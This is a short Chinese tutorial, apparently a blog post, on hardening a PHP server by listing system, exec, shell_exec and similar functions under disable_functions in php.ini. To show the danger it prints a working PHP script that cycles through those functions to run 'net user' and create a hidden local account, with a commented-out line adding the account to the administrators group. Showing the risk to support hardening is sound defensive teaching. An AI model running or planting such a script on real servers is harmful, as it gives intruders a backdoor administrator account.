配置php.ini使服务器更加安全防止入侵
中国网络营销推广专家
配置php.ini使服务器更加安全,屏蔽危险函数,防止入侵
大家可以建立一个test.php文件,里边输入
<?php
phpinfo();
?>
以上代码,然后在浏览器打开他,就可以查看php.ini的存放位置.
然后找到php.ini
查找
disable_functions =
一般情况他是空的,不禁用任何PHP的函数.
你把他修改成为如下,即禁用最危险的7个PHP功能函数
disable_functions = system,exec,passthru,shell_exec,popen,proc_open,assert
即可有效的防止别人通过PHP程序入侵服务器.
修改之后,要重启IIS或者是apache才能生效的.
你若有兴趣的话,你把以下代码另存为abc.php然后在浏览器打开他,就可以创建一个管理员帐号,所以说服务器不禁用以上PHP函数的话,是非常危险的.
复制代码
-
-
<?php
-
$cmd = 'net user admin99 admin99 /add';
-
adduser($cmd);
-
//$cmd = 'net localgroup administrators admin99 /add';
-
//adduser($cmd);
-
function adduser($cmd) {
-
if (function_exists('exec')) {
-
@exec($cmd, $res);
-
$res = join("\n", $res);
-
} elseif (function_exists('shell_exec')) {
-
$res = @shell_exec($cmd);
-
} elseif (function_exists('system')) {
-
@ob_start();
-
@system($cmd);
-
$res = @ob_get_contents();
-
@ob_end_clean();
-
} elseif (function_exists('passthru')) {
-
@ob_start();
-
@passthru($cmd);
-
$res = @ob_get_contents();
-
@ob_end_clean();
-
} elseif (@is_resource($f = @popen($cmd, "r"))) {
-
die("$cmd");
-
$res = '';
-
while (!@feof($f)) {
-
$res .= @fread($f, 1024);
-
}
-
@pclose($f);
-
}else{
-
die("你的服务器是安全的!");
-
}
-
die($res);
-
}
-
?>